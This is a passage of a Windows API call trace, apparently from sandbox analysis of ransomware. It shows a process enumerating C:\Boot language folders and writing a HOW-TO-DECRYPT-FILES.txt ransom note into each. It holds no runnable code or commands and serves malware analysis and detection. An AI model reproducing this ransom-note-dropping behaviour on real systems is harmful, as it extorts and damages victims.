lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1ccd6d4 | out: lpFileInformation=0x1ccd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55274c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8b85ae0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0044.968] GetLastError () returned 0x12 [0044.968] SetErrorMode (uMode=0x0) returned 0x1 [0044.969] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.969] GetLastError () returned 0x12 [0044.969] SetErrorMode (uMode=0x1) returned 0x0 [0044.969] CreateFileW (lpFileName="C:\\Boot\\da-DK\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\da-dk\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.969] GetLastError () returned 0x0 [0044.969] GetFileType (hFile=0x184) returned 0x1 [0044.969] SetErrorMode (uMode=0x0) returned 0x1 [0044.969] GetFileType (hFile=0x184) returned 0x1 [0044.969] WriteFile (in: hFile=0x184, lpBuffer=0x1ce90f8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1ce90f8*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0044.970] GetLastError () returned 0x0 [0044.970] CloseHandle (hObject=0x184) returned 1 [0044.970] GetLastError () returned 0x0 [0044.970] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.970] GetLastError () returned 0x0 [0044.970] SetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.971] GetLastError () returned 0x0 [0044.971] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0044.971] GetLastError () returned 0x0 [0044.971] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.971] GetLastError () returned 0x0 [0044.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.971] GetLastError () returned 0x0 [0044.971] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0044.971] GetLastError () returned 0x0 [0044.971] SetErrorMode (uMode=0x1) returned 0x0 [0044.971] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.972] GetLastError () returned 0x0 [0044.972] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.972] GetLastError () returned 0x0 [0044.972] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.972] GetLastError () returned 0x0 [0044.972] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.972] GetLastError () returned 0x12 [0044.972] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.972] SetErrorMode (uMode=0x0) returned 0x1 [0044.972] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0044.972] GetLastError () returned 0x12 [0044.972] SetErrorMode (uMode=0x1) returned 0x0 [0044.972] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.972] GetLastError () returned 0x12 [0044.973] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.973] GetLastError () returned 0x12 [0044.973] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.973] GetLastError () returned 0x12 [0044.973] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.973] GetLastError () returned 0x12 [0044.973] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.973] SetErrorMode (uMode=0x0) returned 0x1 [0044.973] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0044.973] GetLastError () returned 0x12 [0044.973] SetErrorMode (uMode=0x1) returned 0x0 [0044.973] GetFileAttributesExW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cebe00 | out: lpFileInformation=0x1cebe00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0044.975] GetLastError () returned 0x12 [0044.975] SetErrorMode (uMode=0x0) returned 0x1 [0044.977] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.977] GetLastError () returned 0x12 [0044.977] SetErrorMode (uMode=0x1) returned 0x0 [0044.977] CreateFileW (lpFileName="C:\\Boot\\de-DE\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\de-de\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.977] GetLastError () returned 0x0 [0044.977] GetFileType (hFile=0x184) returned 0x1 [0044.977] SetErrorMode (uMode=0x0) returned 0x1 [0044.977] GetFileType (hFile=0x184) returned 0x1 [0044.977] WriteFile (in: hFile=0x184, lpBuffer=0x1d07824*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1d07824*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0044.978] GetLastError () returned 0x0 [0044.978] CloseHandle (hObject=0x184) returned 1 [0044.978] GetLastError () returned 0x0 [0044.978] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.978] GetLastError () returned 0x0 [0044.978] SetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.979] GetLastError () returned 0x0 [0044.979] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0044.979] GetLastError () returned 0x0 [0044.979] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.979] GetLastError () returned 0x0 [0044.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.979] GetLastError () returned 0x0 [0044.979] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0044.979] GetLastError () returned 0x0 [0044.979] SetErrorMode (uMode=0x1) returned 0x0 [0044.979] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.979] GetLastError () returned 0x0 [0044.979] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.979] GetLastError () returned 0x0 [0044.979] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.979] GetLastError () returned 0x0 [0044.980] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.980] GetLastError () returned 0x12 [0044.980] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.980] SetErrorMode (uMode=0x0) returned 0x1 [0044.980] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0044.980] GetLastError () returned 0x12 [0044.980] SetErrorMode (uMode=0x1) returned 0x0 [0044.980] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.980] GetLastError () returned 0x12 [0044.980] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.980] GetLastError () returned 0x12 [0044.980] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.980] GetLastError () returned 0x12 [0044.980] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.980] GetLastError () returned 0x12 [0044.981] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.981] SetErrorMode (uMode=0x0) returned 0x1 [0044.981] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0044.981] GetLastError () returned 0x12 [0044.981] SetErrorMode (uMode=0x1) returned 0x0 [0044.981] GetFileAttributesExW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1d0a52c | out: lpFileInformation=0x1d0a52c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0044.981] GetLastError () returned 0x12 [0044.981] SetErrorMode (uMode=0x0) returned 0x1 [0044.985] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.985] GetLastError () returned 0x12 [0044.985] SetErrorMode (uMode=0x1) returned 0x0 [0044.985] CreateFileW (lpFileName="C:\\Boot\\el-GR\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\el-gr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.985] GetLastError () returned 0x0 [0044.985] GetFileType (hFile=0x184) returned 0x1 [0044.985] SetErrorMode (uMode=0x0) returned 0x1 [0044.985] GetFileType (hFile=0x184) returned 0x1 [0044.985] WriteFile (in: hFile=0x184, lpBuffer=0x1b29d48*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b29d48*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x184) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.986] GetLastError () returned 0x0 [0044.986] SetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.987] GetLastError () returned 0x0 [0044.987] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0044.987] GetLastError () returned 0x0 [0044.987] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.987] GetLastError () returned 0x0 [0044.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.987] GetLastError () returned 0x0 [0044.987] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0044.987] GetLastError () returned 0x0 [0044.987] SetErrorMode (uMode=0x1) returned 0x0 [0044.987] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0044.987] GetLastError () returned 0x0 [0044.988] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.988] GetLastError () returned 0x0 [0044.988] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.988] GetLastError () returned 0x0 [0044.988] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.988] GetLastError () returned 0x0 [0044.988] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.988] GetLastError () returned 0x12 [0044.988] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0044.988] SetErrorMode (uMode=0x0) returned 0x1 [0044.988] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0044.988] GetLastError () returned 0x12 [0044.988] SetErrorMode (uMode=0x1) returned 0x0 [0044.988] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0044.988] GetLastError () returned 0x12 [0044.989] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.989] GetLastError () returned 0x12 [0044.989] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.989] GetLastError () returned 0x12 [0044.989] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.989] GetLastError () returned 0x12 [0044.989] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.989] GetLastError () returned 0x12 [0044.989] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0044.989] SetErrorMode (uMode=0x0) returned 0x1 [0044.989] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0044.989] GetLastError () returned 0x12 [0044.989] SetErrorMode (uMode=0x1) returned 0x0 [0044.989] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b2cb78 | out: lpFileInformation=0x1b2cb78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40)) returned 1 [0044.989] GetLastError () returned 0x12 [0044.989] SetErrorMode (uMode=0x0) returned 0x1 [0044.990] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.990] GetLastError () returned 0x12 [0044.990] SetErrorMode (uMode=0x1) returned 0x0 [0044.990] CreateFileW (lpFileName="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\en-us\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.991] GetLastError () returned 0x0 [0044.991] GetFileType (hFile=0x184) returned 0x1 [0044.991] SetErrorMode (uMode=0x0) returned 0x1 [0044.991] GetFileType (hFile=0x184) returned 0x1 [0044.991] WriteFile (in: hFile=0x184, lpBuffer=0x1b484b4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b484b4*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0044.992] GetLastError () returned 0x0 [0044.992] CloseHandle (hObject=0x184) returned 1 [0044.992] GetLastError () returned 0x0 [0044.992] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.992] GetLastError () returned 0x0 [0044.992] SetFileAttributesW (lpFileName="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.993] GetLastError () returned 0x0 [0044.993] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\memtest.exe.mui", lpFilePart=0x0) returned 0x1d [0044.993] GetLastError () returned 0x0 [0044.993] SetErrorMode (uMode=0x1) returned 0x0 [0044.993] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b4a100 | out: lpFileInformation=0x1b4a100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x6c8f1600, ftLastWriteTime.dwHighDateTime=0x1ca0428, nFileSizeHigh=0x0, nFileSizeLow=0xaa50)) returned 1 [0044.993] GetLastError () returned 0x0 [0044.993] SetErrorMode (uMode=0x0) returned 0x1 [0044.994] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.994] GetLastError () returned 0x0 [0044.994] SetErrorMode (uMode=0x1) returned 0x0 [0044.994] CreateFileW (lpFileName="C:\\Boot\\en-US\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\en-us\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.994] GetLastError () returned 0x5 [0044.995] SetErrorMode (uMode=0x0) returned 0x1 [0044.995] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0044.995] GetLastError () returned 0x5 [0044.996] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.996] GetLastError () returned 0x5 [0044.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.996] GetLastError () returned 0x5 [0044.996] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0044.996] GetLastError () returned 0x5 [0044.996] SetErrorMode (uMode=0x1) returned 0x0 [0044.996] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0044.996] GetLastError () returned 0x5 [0044.996] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.996] GetLastError () returned 0x5 [0044.996] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.996] GetLastError () returned 0x5 [0044.996] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.996] GetLastError () returned 0x12 [0044.996] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0044.997] SetErrorMode (uMode=0x0) returned 0x1 [0044.997] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0044.997] GetLastError () returned 0x12 [0044.997] SetErrorMode (uMode=0x1) returned 0x0 [0044.997] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0044.997] GetLastError () returned 0x12 [0044.997] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.997] GetLastError () returned 0x12 [0044.997] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.997] GetLastError () returned 0x12 [0044.997] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.997] GetLastError () returned 0x12 [0044.997] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0044.997] SetErrorMode (uMode=0x0) returned 0x1 [0044.997] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0044.997] GetLastError () returned 0x12 [0044.997] SetErrorMode (uMode=0x1) returned 0x0 [0044.997] GetFileAttributesExW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b68ad4 | out: lpFileInformation=0x1b68ad4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552c0f00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0044.998] GetLastError () returned 0x12 [0044.998] SetErrorMode (uMode=0x0) returned 0x1 [0044.998] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.998] GetLastError () returned 0x12 [0044.998] SetErrorMode (uMode=0x1) returned 0x0 [0044.998] CreateFileW (lpFileName="C:\\Boot\\es-ES\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\es-es\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.998] GetLastError () returned 0x0 [0044.998] GetFileType (hFile=0x184) returned 0x1 [0044.998] SetErrorMode (uMode=0x0) returned 0x1 [0044.998] GetFileType (hFile=0x184) returned 0x1 [0044.999] WriteFile (in: hFile=0x184, lpBuffer=0x1b845e8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b845e8*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0044.999] GetLastError () returned 0x0 [0044.999] CloseHandle (hObject=0x184) returned 1 [0045.000] GetLastError () returned 0x0 [0045.000] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.000] GetLastError () returned 0x0 [0045.000] SetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.000] GetLastError () returned 0x0 [0045.000] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0045.000] GetLastError () returned 0x0 [0045.000] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: 